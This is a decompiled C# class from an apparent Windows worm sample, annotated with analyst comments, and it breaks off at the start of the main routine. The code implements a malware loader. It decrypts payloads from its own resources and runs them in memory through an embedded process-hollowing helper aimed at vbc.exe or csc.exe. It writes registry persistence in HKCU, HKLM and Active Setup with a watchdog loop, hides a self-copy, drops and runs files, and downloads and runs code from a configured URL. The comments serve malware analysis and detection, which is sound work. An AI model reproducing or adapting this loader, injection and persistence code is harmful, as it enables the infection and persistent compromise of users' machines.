// Decompiled with JetBrains decompiler
|
|
// Type: Tm2tqtua3sspuhohl2o5frgcxkwutet2c.Xcpjaqmaubj2y0o3n
|
|
// Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 5406B450-382A-49C3-BEAD-27BB328AB378
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-6d5fef800026555b0865a8fd9ba051fda07985211385e0bd92a5e9a77af03653.exe
|
|
|
|
using G1iw5jvdvf5jyuwmtz03k02vp;
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.IO.Compression;
|
|
using System.Management;
|
|
using System.Net;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
|
|
namespace Tm2tqtua3sspuhohl2o5frgcxkwutet2c
|
|
{
|
|
public class Xcpjaqmaubj2y0o3n
|
|
{
|
|
// Analyst note: state and configuration for this sample. Apart from the first two fields and the
// last two, every field below is assigned by xpjiguggif5df23oi from a delimiter-separated
// configuration string; the initial values shown here are only placeholders until that runs.
// Success flag for the in-memory loader: set to false by the catch blocks of
// pq0wico5ukmaxyfwlssnrl0r1nqartkt4 / ooaqlrxjthzq5ykyeqamxwsxh, read and reset to true by Qhlb0achfvgjxeekj.
private static bool Vyydwy2dzohvetixn = true;
|
|
// Payload bytes read from the executable's own resources in bocln5xhicnup1rlmeg3v0wq5fq30ikg2.
private byte[] Xvzsy20ikq50fiuzzzsw14i22;
|
|
// Set to true by Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy (registry persistence); gates the self-copy step.
private bool n2gipyxzj1jd3ijqb;
|
|
// Decoy message box: text, caption, enable switch ("1"), button index, icon index, delay in seconds.
private string fzeil4ihxre2gqh3ygpyffp15;
|
|
private string qw2lxynmeozut0doo;
|
|
private string Cllbarbs03nsn03hk0bknvl3n = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private int I12ss4uzgimbzl5qa;
|
|
private int dluh54iqwipbeun4nsizlk3foyfinw5wt;
|
|
private int Hgmfkbt4atcy55dirqkgtdkb5;
|
|
// Selector checked by P2dz552iekyo3s3by to decide whether the payload byte transform is applied.
private string Dx4pxl4hlvcwokaeq = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("XRO");
|
|
private string zyygx4b4iahtt0izd = string.Empty;
|
|
private string Q5aj14jzmb5gozvrp = string.Empty;
|
|
// Output buffer size used when the payload is GZip-compressed (Qeujo4xlzlmqxzlwt == "1").
private int Sqsgcrexehem0lg3mionbxiuw;
|
|
private string Qeujo4xlzlmqxzlwt = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
// Three "1"/"0" switches selecting registry persistence modes 1, 2 and 3 respectively.
private string N4rfcpacyzvdyb5o5pseuwja0 = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string ovvhzz3v4t0lncqhc = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
private string hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
|
|
// Registry key paths and value/subkey names handed to the persistence routines.
private string Yu13rcd5iimiqemzz = string.Empty;
|
|
private string Ouyjahe11vseyu1gc = string.Empty;
|
|
private string Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = string.Empty;
|
|
private string wlzgy5x503ocrxvto = string.Empty;
|
|
private string mlzo2db1vixlaay2xx3qm1uh1 = string.Empty;
|
|
// Self-copy location: file name, base folder, then hidden/read-only/system switches ("1" = set).
private string Ifbnriw30u3zqko1o = string.Empty;
|
|
private string O52jpa3c1kjywan03 = string.Empty;
|
|
private string aebl4g0r22vys142j542rkxik = string.Empty;
|
|
private string Pi5xwja3tpz1vyvxe0bvaszsw = string.Empty;
|
|
private string W0igi2snxiuevrujvdeszp1bxkguemxod = string.Empty;
|
|
// Optional sub-folder under the base folder for the self-copy.
private string Osbrxysckqx0aqx1lzguqifvs = string.Empty;
|
|
// true: run the payload as a managed assembly in-process; false: hand it to the embedded helper.
private bool Zx2ycojwb320y2n31;
|
|
// true: additionally write the payload to Ueczuk1jlbi3nbg5x2h1wuon0 and start it.
private bool Kbkqxyuop35q5nercdcrjitsn;
|
|
private string Ueczuk1jlbi3nbg5x2h1wuon0 = string.Empty;
|
|
// File path passed as the second argument to the embedded helper's method on every Invoke call.
private string Ne4uiww2g1iuhqrgv = string.Empty;
|
|
// Download stage: enable flag, URL, handling mode, target folder, target file name, attribute flags.
private bool waiw3pzzuvdgyn5dx3idhqwhncujkp40q;
|
|
private string upzpncz1hdeloi5k3rlq4a14w = string.Empty;
|
|
private string ogs5wi51r3m1bqoyn = string.Empty;
|
|
private string Fl1t0wgsikf4mpxykcardit3b = string.Empty;
|
|
private string Abfzh2zlzdzdgmqoqnumemerp = string.Empty;
|
|
private bool etx2nx1n4akedmv4fu2mqzcc0;
|
|
private bool Dwfbus3rr2dghn14mxukem4jr;
|
|
private bool Bm3illttk5nwmenvbn3jbmios;
|
|
// Parsed from the configuration but not read anywhere else in this file.
private bool s1rnoof103dimlt4vbd0kazwizm4euy4s;
|
|
// Instance and method handle obtained from the embedded helper assembly (see Ceyweulgsxaof4hwmnwokglbk).
private object Rebbtyainmzrpdxrpkhemquuf;
|
|
private MethodInfo Fau0pig3abdcym2njphkzgkxl;
|
|
|
|
// Analyst note: configuration parser. The same input string is split four times, each time on a
// different marker string, and fixed positions of each result are copied into the instance fields.
// No bounds or format checks are made; a malformed blob throws and is handled by the caller's catch.
// NOTE(review): the string decoder A1ns3kzzckrkw2k2snvelcbss is defined outside this file. If it
// de-interleaves its argument (even-position characters stored first, then odd-position ones),
// "wniidr" reads "windir" and the three long literals in the switch read as
// \Microsoft.NET\Framework64\v2.0.50727\vbc.exe, \Microsoft.NET\Framework\v2.0.50727\vbc.exe and
// \Microsoft.NET\Framework\v2.0.50727\csc.exe - confirm against the decoder.
private void xpjiguggif5df23oi(string xkcps1zic2cskbd1y)
|
|
{
|
|
string[] separator1 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rpspaujmfcfeku02tmvpfrcod")
|
|
};
|
|
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
|
|
string[] separator2 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vmh2pox3hvii1ls52")
|
|
};
|
|
string[] strArray2 = xkcps1zic2cskbd1y.Split(separator2, StringSplitOptions.None);
|
|
string[] separator3 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("uo3midvthz4usmhbcddxzwvg4")
|
|
};
|
|
string[] strArray3 = xkcps1zic2cskbd1y.Split(separator3, StringSplitOptions.None);
|
|
string[] separator4 = new string[1]
|
|
{
|
|
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("hzoym5z0i1xmrfcmygv11yqya")
|
|
};
|
|
string[] strArray4 = xkcps1zic2cskbd1y.Split(separator4, StringSplitOptions.None);
|
|
// Section 1: decoy message box settings (enable switch, text, caption, button index, icon index, delay).
this.Cllbarbs03nsn03hk0bknvl3n = strArray1[1];
|
|
this.fzeil4ihxre2gqh3ygpyffp15 = strArray1[2];
|
|
this.qw2lxynmeozut0doo = strArray1[3];
|
|
this.I12ss4uzgimbzl5qa = Convert.ToInt32(strArray1[4]);
|
|
this.dluh54iqwipbeun4nsizlk3foyfinw5wt = Convert.ToInt32(strArray1[5]);
|
|
this.Hgmfkbt4atcy55dirqkgtdkb5 = Convert.ToInt32(strArray1[6]);
|
|
// Section 2: payload transform selector plus two strings that are not read elsewhere in this file.
this.Dx4pxl4hlvcwokaeq = strArray2[1];
|
|
this.zyygx4b4iahtt0izd = strArray2[2];
|
|
this.Q5aj14jzmb5gozvrp = strArray2[3];
|
|
// Section 3: payload size/compression, persistence switches and registry names, self-copy settings.
this.Sqsgcrexehem0lg3mionbxiuw = Convert.ToInt32(strArray3[1]);
|
|
this.Qeujo4xlzlmqxzlwt = strArray3[2];
|
|
this.N4rfcpacyzvdyb5o5pseuwja0 = strArray3[3];
|
|
this.ovvhzz3v4t0lncqhc = strArray3[4];
|
|
this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = strArray3[5];
|
|
this.Yu13rcd5iimiqemzz = strArray3[6];
|
|
this.Ouyjahe11vseyu1gc = strArray3[7];
|
|
this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = strArray3[8];
|
|
this.wlzgy5x503ocrxvto = strArray3[9];
|
|
this.mlzo2db1vixlaay2xx3qm1uh1 = strArray3[10];
|
|
this.Ifbnriw30u3zqko1o = strArray3[11];
|
|
this.O52jpa3c1kjywan03 = this.bxmgxqvn0tzn2pwdo5ezgxkdh(strArray3[12]);
|
|
this.aebl4g0r22vys142j542rkxik = strArray3[13];
|
|
this.Pi5xwja3tpz1vyvxe0bvaszsw = strArray3[14];
|
|
this.W0igi2snxiuevrujvdeszp1bxkguemxod = strArray3[15];
|
|
this.Zx2ycojwb320y2n31 = Convert.ToBoolean(strArray3[16]);
|
|
this.Kbkqxyuop35q5nercdcrjitsn = Convert.ToBoolean(strArray3[17]);
|
|
// Drop path for the payload: configured folder + "\" + a random file name (extension replaced below).
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.yti5olupwaivlclet(strArray3[18]) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + Path.GetRandomFileName();
|
|
this.Osbrxysckqx0aqx1lzguqifvs = strArray3[19];
|
|
this.Ne4uiww2g1iuhqrgv = strArray3[20];
|
|
// The last four characters of the random name are replaced by the decoded literal below.
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.Ueczuk1jlbi3nbg5x2h1wuon0.Substring(0, this.Ueczuk1jlbi3nbg5x2h1wuon0.Length - 4) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss(".xee");
|
|
// Return value is discarded; this call has no effect on the fields.
Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
|
|
// Values "0" and "1" are replaced by a path built from an environment variable; "0" picks between
// two literals on IntPtr.Size (process bitness). Any other value is kept as configured.
// Triage hint: this path is what the helper receives on every Invoke, so the named binary starting
// as a child of this sample is worth correlating in process-creation telemetry.
switch (this.Ne4uiww2g1iuhqrgv)
|
|
{
|
|
case "0":
|
|
try
|
|
{
|
|
this.Ne4uiww2g1iuhqrgv = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr6\\20577vceeMcootNTFaeok4v..02\\b.x") : Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577vceeMcootNTFaeokv..02\\b.x");
|
|
break;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
break;
|
|
}
|
|
case "1":
|
|
this.Ne4uiww2g1iuhqrgv = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577cceeMcootNTFaeokv..02\\s.x");
|
|
break;
|
|
}
|
|
// Section 4: download stage (enable flag, URL, handling mode, folder token, file name, attribute flags).
this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q = Convert.ToBoolean(strArray4[1]);
|
|
this.upzpncz1hdeloi5k3rlq4a14w = strArray4[2];
|
|
this.ogs5wi51r3m1bqoyn = strArray4[3];
|
|
this.Fl1t0wgsikf4mpxykcardit3b = strArray4[4];
|
|
this.Abfzh2zlzdzdgmqoqnumemerp = strArray4[5];
|
|
this.etx2nx1n4akedmv4fu2mqzcc0 = Convert.ToBoolean(strArray4[6]);
|
|
this.Dwfbus3rr2dghn14mxukem4jr = Convert.ToBoolean(strArray4[7]);
|
|
this.Bm3illttk5nwmenvbn3jbmios = Convert.ToBoolean(strArray4[8]);
|
|
this.s1rnoof103dimlt4vbd0kazwizm4euy4s = Convert.ToBoolean(strArray4[9]);
|
|
this.Fl1t0wgsikf4mpxykcardit3b = this.yti5olupwaivlclet(this.Fl1t0wgsikf4mpxykcardit3b);
|
|
// Lookup tables that turn the configured integer indexes into MessageBox button and icon values.
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
|
|
{
|
|
MessageBoxButtons.OK,
|
|
MessageBoxButtons.OKCancel,
|
|
MessageBoxButtons.YesNo,
|
|
MessageBoxButtons.YesNoCancel,
|
|
MessageBoxButtons.RetryCancel,
|
|
MessageBoxButtons.AbortRetryIgnore
|
|
};
|
|
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
|
|
{
|
|
MessageBoxIcon.Hand,
|
|
MessageBoxIcon.Asterisk,
|
|
MessageBoxIcon.Question,
|
|
MessageBoxIcon.Exclamation,
|
|
MessageBoxIcon.None
|
|
};
|
|
// The decoy dialog is shown only when the enable switch equals the decoded "1", after the configured delay.
if (!(this.Cllbarbs03nsn03hk0bknvl3n == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
|
|
return;
|
|
Thread.Sleep(this.Hgmfkbt4atcy55dirqkgtdkb5 * 1000);
|
|
int num = (int) MessageBox.Show(this.fzeil4ihxre2gqh3ygpyffp15, this.qw2lxynmeozut0doo, messageBoxButtonsArray[this.I12ss4uzgimbzl5qa], messageBoxIconArray[this.dluh54iqwipbeun4nsizlk3foyfinw5wt]);
|
|
}
|
|
|
|
// Analyst note: GZip decompression helper. Wraps the input bytes in a MemoryStream, opens a
// decompressing GZipStream over it, issues one Read into a buffer of the caller-supplied size and
// returns that buffer. The size comes from the configuration, not from the compressed data.
private byte[] T20r4skkjzxet5xxndjdxm23nq1de3ste(
|
|
byte[] j53vpo23pks1sawtewkqd4g3v,
|
|
int wtxw3dfyzvb2m5edzmygxag3t)
|
|
{
|
|
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(j53vpo23pks1sawtewkqd4g3v), CompressionMode.Decompress);
|
|
byte[] buffer = new byte[wtxw3dfyzvb2m5edzmygxag3t];
|
|
gzipStream.Read(buffer, 0, buffer.Length);
|
|
return buffer;
|
|
}
|
|
|
|
// Analyst note: loads a helper assembly from this executable's own manifest resources. The resource
// bytes are read by q1cagpbvwn04kmqyi, passed through Rhjia2qmjg1uefwsxroduqr0s (a byte transform
// defined outside this file) and given to Assembly.Load, so the helper never exists as a file on disk.
// After a one-second sleep the type at the given index is selected, a MethodInfo looked up by a
// decoded name is cached in Fau0pig3abdcym2njphkzgkxl, and a new instance of the type is returned.
// NOTE(review): the string decoder is not in this file; if it de-interleaves (even positions first,
// then odd), the resource name reads "runPE.dll" and the method name "Run" - confirm.
private object Ceyweulgsxaof4hwmnwokglbk(int mn0yawr33ammr4eax42s3tcgr)
|
|
{
|
|
Assembly assembly = Assembly.Load(Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(Xcpjaqmaubj2y0o3n.q1cagpbvwn04kmqyi(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rnEdluP.l"))));
|
|
Thread.Sleep(1000);
|
|
System.Type type = assembly.GetTypes()[mn0yawr33ammr4eax42s3tcgr];
|
|
this.Fau0pig3abdcym2njphkzgkxl = type.GetMethod(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Rnu"));
|
|
return Activator.CreateInstance(type);
|
|
}
|
|
|
|
// Analyst note: registry persistence watchdog. Writes the given value (name, data) under the given
// HKEY_CURRENT_USER subkey, then loops with no exit condition (flag is never cleared): each pass
// pumps the message queue, probes for a subkey built from the key path plus a decoded literal, and
// when that probe returns null writes the value again, then sleeps two seconds.
// Parameters, in order: subkey path under HKCU, value name, value data.
// Triage hint: one process writing the same HKCU value every ~2 seconds is the observable side
// effect, and removing the value while the process is alive will not stick. Which key this is
// depends on the configuration blob and is not visible here.
private void persistenceStartup(
|
|
string Ymom4ixsncavvmzwlpzsuuw3j,
|
|
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
|
|
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x)
|
|
{
|
|
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true);
|
|
bool flag = true;
|
|
while (flag)
|
|
{
|
|
Application.DoEvents();
|
|
if (registryKey.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\a1adcpdsq0gn123io4m1f55gxptbkhd2e")) == null)
|
|
registryKey.SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
Thread.Sleep(2000);
|
|
}
|
|
}
|
|
|
|
// Analyst note: optional payload de-obfuscation. When the configured selector equals the decoded
// literal, the bytes are replaced by the output of Rhjia2qmjg1uefwsxroduqr0s (defined outside this
// file); otherwise they are returned unchanged.
// NOTE(review): the literal presumably decodes to "xor", which would make the helper an XOR
// routine - confirm against the Zgyvqmp0xpqwooihm class.
private byte[] P2dz552iekyo3s3by(byte[] xkcps1zic2cskbd1y)
|
|
{
|
|
if (this.Dx4pxl4hlvcwokaeq == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("xro"))
|
|
xkcps1zic2cskbd1y = Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(xkcps1zic2cskbd1y);
|
|
return xkcps1zic2cskbd1y;
|
|
}
|
|
|
|
// Analyst note: handles bytes fetched by the download stage (called with WebClient.DownloadData
// output from bocln5xhicnup1rlmeg3v0wq5fq30ikg2). Behaviour depends on the configured mode string:
//   decoded "0": try to run the bytes as a managed assembly in-process; if that reports failure,
//                hand them to the embedded helper together with the host path; if any of that
//                throws, write them to a fresh temp file and start it.
//   decoded "1": write them to <configured folder><configured name>, start the file, then add the
//                Hidden / ReadOnly / System attributes according to the three flags.
// Every exception is swallowed, so a failed download stage leaves no error output.
private void fyld3x5pir2kaoksligurapzj(byte[] Cplqgntbylcl1knxmqpm2hjar)
|
|
{
|
|
try
|
|
{
|
|
if (this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
|
|
{
|
|
try
|
|
{
|
|
// Qhlb0achfvgjxeekj returns false when the in-process load or entry-point call threw.
if (!this.Qhlb0achfvgjxeekj(Cplqgntbylcl1knxmqpm2hjar))
|
|
{
|
|
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
|
|
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
|
|
{
|
|
(object) Cplqgntbylcl1knxmqpm2hjar,
|
|
(object) this.Ne4uiww2g1iuhqrgv,
|
|
null
|
|
});
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
// Last resort for mode "0": the payload touches disk as a temp file and is started from there.
string tempFileName = Path.GetTempFileName();
|
|
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, tempFileName, true);
|
|
}
|
|
}
|
|
if (!(this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
|
|
return;
|
|
string str = this.Fl1t0wgsikf4mpxykcardit3b + this.Abfzh2zlzdzdgmqoqnumemerp;
|
|
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, str, true);
|
|
if (this.etx2nx1n4akedmv4fu2mqzcc0)
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
|
|
if (this.Dwfbus3rr2dghn14mxukem4jr)
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
|
|
if (!this.Bm3illttk5nwmenvbn3jbmios)
|
|
return;
|
|
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
}
|
|
}
|
|
|
|
// Analyst note: runs the given bytes as a managed assembly via ooaqlrxjthzq5ykyeqamxwsxh and
// reports the outcome. The static flag Vyydwy2dzohvetixn is cleared by the loader's catch blocks;
// this method returns its current value (true = no exception observed) and resets it to true so
// the next call starts clean.
private bool Qhlb0achfvgjxeekj(byte[] Zq0k51bndsjftafxi)
|
|
{
|
|
Xcpjaqmaubj2y0o3n.ooaqlrxjthzq5ykyeqamxwsxh(Zq0k51bndsjftafxi);
|
|
bool vyydwy2dzohvetixn = Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn;
|
|
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = true;
|
|
return vyydwy2dzohvetixn;
|
|
}
|
|
|
|
// Analyst note: drop-and-run helper. Writes the byte array to the given path and, when the third
// argument is true, starts that file as a new process with default StartInfo. All exceptions are
// swallowed. Every caller in this file passes true.
// Triage hint: file-creation followed by process-creation for the same path, both by this
// process, is the event pair this routine produces.
private void Xu4noszs2jndqy0uakulzk0hj(
|
|
byte[] iz1q112gcqzev5oqr,
|
|
string Dutorh5b0eqbkqejp,
|
|
bool Fc4ucvsrmmkck30rx)
|
|
{
|
|
try
|
|
{
|
|
System.IO.File.WriteAllBytes(Dutorh5b0eqbkqejp, iz1q112gcqzev5oqr);
|
|
if (!Fc4ucvsrmmkck30rx)
|
|
return;
|
|
new Process()
|
|
{
|
|
StartInfo = {
|
|
FileName = Dutorh5b0eqbkqejp
|
|
}
|
|
}.Start();
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
// Analyst note: reads a resource out of the running module into a managed byte array using four
// wrappers on Mvsaeg2eeoaqx3utk (defined outside this file): obtain a module handle for the empty
// string, locate the resource from the integer and string arguments, query its size, obtain a
// pointer to its data, then Marshal.Copy it out.
// NOTE(review): the wrappers presumably map to GetModuleHandle / FindResource / SizeofResource /
// LoadResource - confirm against that class.
// The first parameter is not used in the body. On any exception a message is printed to the
// console and null is returned.
// Triage hint: the configuration and payloads live in the PE resource section of the sample, so
// static extraction of the resources is the route to the configuration.
private byte[] idbm12rhs0k0m25by(
|
|
string V3ih4ivpcexzrkelfjctk5bov,
|
|
int Wi2vtkb2qd4j53iy5fbdxtgmp,
|
|
string k0vs32obabddwwiqnt4br14zo)
|
|
{
|
|
try
|
|
{
|
|
IntPtr hModule = Mvsaeg2eeoaqx3utk.cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string.Empty);
|
|
IntPtr hResInfo = Mvsaeg2eeoaqx3utk.Nyja0dryfvflph11ok4ga5zpz(hModule, Wi2vtkb2qd4j53iy5fbdxtgmp, k0vs32obabddwwiqnt4br14zo);
|
|
uint length = Mvsaeg2eeoaqx3utk.Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(hModule, hResInfo);
|
|
IntPtr source = Mvsaeg2eeoaqx3utk.Xpo3aq0mxqyvzr1zld5qguuzg(hModule, hResInfo);
|
|
byte[] destination = new byte[(IntPtr) length];
|
|
Marshal.Copy(source, destination, 0, (int) length);
|
|
return destination;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errraigrsuc:ro edn eore ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
|
|
return (byte[]) null;
|
|
}
|
|
}
|
|
|
|
// Analyst note: one-shot registry persistence, selected by the last argument:
//   1: set (value name -> data) under the given HKEY_CURRENT_USER subkey;
//   2: set (value name -> data) under the given HKEY_LOCAL_MACHINE subkey;
//   3: create HKLM\<key>\<name>, set a value with a decoded fixed name to the data, close it, and
//      delete HKCU\<key>\<name> if that subkey exists.
// Parameters, in order: subkey path, value or subkey name, data (the caller passes the path of the
// self-copy), mode. The instance flag n2gipyxzj1jd3ijqb is set on entry for every mode.
// NOTE(review): the string decoder is not in this file; if it de-interleaves (even positions first,
// then odd), the fixed value name reads "StubPath", which together with the HKCU subkey delete
// matches the Active Setup pattern - confirm. Key paths come from the configuration blob.
private void Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(
|
|
string Ymom4ixsncavvmzwlpzsuuw3j,
|
|
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
|
|
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x,
|
|
int lglb5oxkofx5lhfsdpmd3oohjsw1nlznk)
|
|
{
|
|
this.n2gipyxzj1jd3ijqb = true;
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 1)
|
|
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 2)
|
|
Registry.LocalMachine.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk != 3)
|
|
return;
|
|
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie);
|
|
subKey.SetValue(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SuPttbah"), (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
|
|
subKey.Close();
|
|
if (Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, true) == null)
|
|
return;
|
|
Registry.CurrentUser.DeleteSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, false);
|
|
}
|
|
|
|
// Analyst note: maps the configured install-location code to a folder for the self-copy:
// decoded "0" -> the ApplicationData special folder plus a separator, "1" -> Path.GetTempPath(),
// "2" -> the Personal (documents) special folder plus a separator. Any other value yields an
// empty string. All three targets are user-writable and need no elevation.
private string bxmgxqvn0tzn2pwdo5ezgxkdh(string Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3)
|
|
{
|
|
string str = string.Empty;
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
|
|
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
|
|
str = Path.GetTempPath();
|
|
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("2"))
|
|
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
|
|
return str;
|
|
}
|
|
|
|
// Analyst note: main routine of the sample, called from Main after the environment checks. The whole
// body sits in one try/catch that only prints the exception message. Stages, in order:
//   1. read the configuration from the executable's own resources and parse it;
//   2. read the payload resource, optionally decompress and de-obfuscate it;
//   3. execute the payload (embedded helper + host path, or in-process managed load);
//   4. optionally also drop the payload to disk and start it;
//   5. build the install path, write registry persistence, copy itself there, set file attributes;
//   6. process the list of additional bundled files from a third resource;
//   7. optionally download further bytes from a configured URL and run them;
//   8. enter persistenceStartup, which loops without an exit condition.
// rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol is defined outside this file;
// presumably a byte[]-to-string conversion - confirm.
public void bocln5xhicnup1rlmeg3v0wq5fq30ikg2()
|
|
{
|
|
string executablePath = Application.ExecutablePath;
|
|
try
|
|
{
|
|
// Stage 1: configuration blob from the resource identified by (16, decoded name).
